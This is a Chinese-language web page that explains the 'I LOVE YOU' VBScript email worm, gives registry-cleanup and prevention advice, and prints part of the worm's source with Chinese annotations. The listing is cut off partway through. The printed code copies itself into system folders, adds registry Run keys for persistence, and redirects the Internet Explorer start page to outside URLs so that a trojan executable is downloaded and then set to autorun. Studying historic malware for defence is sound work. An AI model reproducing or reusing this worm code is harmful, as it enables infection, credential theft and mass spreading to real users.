📄 1.htm
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>“I LOVE YOU”病毒原理</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TABLE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TD {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
INPUT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TEXTAREA {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
SELECT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
CODE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体r"
}
A {
COLOR: #005500
}
A:hover {
COLOR: #cc0000
}
.border {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; LIST-STYLE-POSITION: inside; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid; LIST-STYLE-TYPE: square; BACKGROUND-COLOR: transparent
}
</STYLE>
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>
<TABLE borderColor=#339933 cellSpacing=0 borderColorDark=#ffffff cellPadding=0
width=10% align=left borderColorLight=#000000 border=1>
<TBODY>
<TR vAlign=center bgColor=#009900>
<TD >
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD width=10 height="31"> </TD>
<TD height="31">
<TABLE width="65%" align=center border=0>
<TBODY>
<TR>
<TD bgColor=#009900>
<DIV align=center><FONT
face="Verdana, Arial, Helvetica, sans-serif"
color=#ffffff><B>“I LOVE YOU”病毒原理 </B></FONT></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
<TR vAlign=center align=left bgColor=#cccccc>
<TD></TD>
</TR>
<TR vAlign=top>
<TD class=tenpt>
<div align="left"><CODE><FONT color=#000000><br>
“I LOVE YOU”病毒是用vbscript写出来的以通过email散布的病毒(这点同梅丽莎相似)。 <BR>
<BR>
潜伏与发作 <BR>
<BR>
所有一切都发生在你打开邮件的附件--该脚本运行,将自身拷贝到 <BR>
$windir/Win32DLL.vbs ($windir = c:\windows on most windows systems)
<BR>
$systemdir/MSKernel32.vbs ($systemdir = c:\windows\system) <BR>
$windir/LOVE-LETTER-FOR-YOU.TXT.vbs <BR>
然后将这些文件加载到注册表中以便在启动时自动运行。 <BR>
然后它将改变默认的ie浏览页面--通过该页面你会下载一个可执行的代码--下载完毕后它会将其加入注册表而且把IE的默认浏览页面再改回about:bland。
<BR>
接下来它就开始往你地址薄里的邮件地址发送信件了--扫描你的硬盘及网络共享硬盘,寻找后缀为: <BR>
Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg <BR>
所有这些文件将变改成这个病毒,而且当它发现mp2或者mp3格式的文件时,会将自身拷贝到同样目录下的一个 vbs script中、当找到mIRC时也将建立一个小的mIRC
script--可以发送html页面--这样就可以对所有加入所在频道的所有用户发送html并感染他们的IE。 <BR>
<BR>
执行 <BR>
会将你的共享密码及IP地址通过email发送给作者。 <BR>
解决 <BR>
打开你的注册表编辑工具并且删除下列键值: <BR>
HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\MSKernel32
<BR>
HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\RunServer\Win32DLL
<BR>
HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\WIN_BUGSF IX
<BR>
<BR>
查找一个叫WIN-BUGFIX.exe的文件并删除它,删除文件$dirsystem\LOVE-LETTER-FOR-YOU.HTM <BR>
<BR>
检查所有后缀为Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg的文件,看是否已被感染,如果是的话就删除它们。
<BR>
<BR>
如果安装了mIRC的话删除你的script.ini文件。 <BR>
删除所有相关的email,或许还需要警告你的朋友们,收到相关信件时要小心 ) <BR>
<BR>
预防 <BR>
<BR>
不要打开任何你有疑惑的文件--如果你没把握的话:) 也可以关掉所有的脚本:( <BR>
<BR>
说明。发表这篇文章的目的在于让各位了解Love Letter, 并且有效地予以预防。如果版主认为本文章可能被坏人利用,请予以删除。程序中的中文注释为作者所加,并针对病毒特点予以解释,同时,给出了预防病毒的方法。Love
Letter写的并不是十分的棒,但是它使用的不少技术确实令人赞叹,病毒作者也许没有受过专业的编程训练,但是从选择的程序资源来看,确实下了一番功夫。
<BR>
本病毒源码也可以用来回答VB爱好者的很多问题。 <BR>
<BR>
源程序 <BR>
rem barok -loveletter(vbe) <i hate go to school> <BR>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philip
<BR>
pines <BR>
' 注释:程序作者的签名(可能) <BR>
<BR>
On Error Resume Next <BR>
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow <BR>
eq="" <BR>
ctr=0 <BR>
Set fso = CreateObject("Scripting.FileSystemObject") <BR>
' 注释:FileSystemObject是M$ VBVM系统中最危险的部分,它的功能十分强大 <BR>
<BR>
' 从病毒使用FSO可以知道,通过修改注册表,可以轻易防止 Love Letter发作。 <BR>
<BR>
set file = fso.OpenTextFile(WScript.ScriptFullname,1) <BR>
vbscopy=file.ReadAll <BR>
main() <BR>
' 注释 - 程序初始化完成。 <BR>
<BR>
sub main() <BR>
On Error Resume Next <BR>
dim wscr,rr <BR>
set wscr=CreateObject("WScript.Shell") <BR>
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scriptin
<BR>
g Host\Settings\Timeout") <BR>
if (rr>=1) then <BR>
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
<BR>
Host\Settings\Timeout",0,"REG_DWORD" <BR>
' 注释 - 防止操作超时造成的程序终止。 <BR>
' 应该说,编写病毒的程序员考虑到了可能发生的问题,这一点值得所有的编程 <BR>
者借鉴。 <BR>
end if <BR>
Set dirwin = fso.GetSpecialFolder(0) <BR>
Set dirsystem = fso.GetSpecialFolder(1) <BR>
Set dirtemp = fso.GetSpecialFolder(2) <BR>
' 获取系统关键文件夹的名称 <BR>
' VB编程时可以用。 <BR>
<BR>
Set c = fso.GetFile(WScript.ScriptFullName) <BR>
c.Copy(dirsystem&"\MSKernel32.vbs") <BR>
c.Copy(dirwin&"\Win32DLL.vbs") <BR>
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <BR>
' 复制自身到关键目录中备用。 <BR>
' 文件名并不是很好。太容易被发现了。 <BR>
<BR>
regruns() <BR>
html() <BR>
spreadtoemail() <BR>
listadriv() <BR>
end sub <BR>
sub regruns() <BR>
' 修改注册表,以便自动装载病毒程序 <BR>
' 预防:经常检查注册表中的这一分支。 <BR>
' 已知的方法还有把HTA放入Startup文件夹。病毒程序使用的方法更先进, <BR>
' 因为它不会因为语言问题而失效。 <BR>
On Error Resume Next <BR>
Dim num,downread <BR>
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
<BR>
n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" <BR>
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
<BR>
n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" <BR>
downread="" <BR>
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explore
<BR>
r\Download Directory") <BR>
if (downread="") then <BR>
downread="c:\" <BR>
end if <BR>
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then <BR>
Randomize <BR>
num = Int((4 * Rnd) + 1) <BR>
if num = 1 then <BR>
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
<BR>
"http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
<BR>
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" <BR>
elseif num = 2 then <BR>
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
<BR>
"http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
<BR>
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" <BR>
elseif num = 3 then <BR>
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
<BR>
"http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
<BR>
POhfgER67b3Vbvg/WIN-BUGSFIX.exe" <BR>
elseif num = 4 then <BR>
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
<BR>
"http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
<BR>
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B
<BR>
UGSFIX.exe" <BR>
end if <BR>
end if <BR>
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then <BR>
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
<BR>
n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" <BR>
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
<BR>
\Start Page","about:blank" <BR>
end if <BR>
end sub <BR>
sub listadriv <BR>
' 遍历所有驱动器。 <BR>
On Error Resume Next <BR>
Dim d,dc,s <BR>
Set dc = fso.Drives <BR>
For Each d in dc <BR>
If d.DriveType = 2 or d.DriveType=3 Then <BR>
folderlist(d.path&"\") <BR>
end if <BR>
Next <BR>
listadriv = s <BR>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -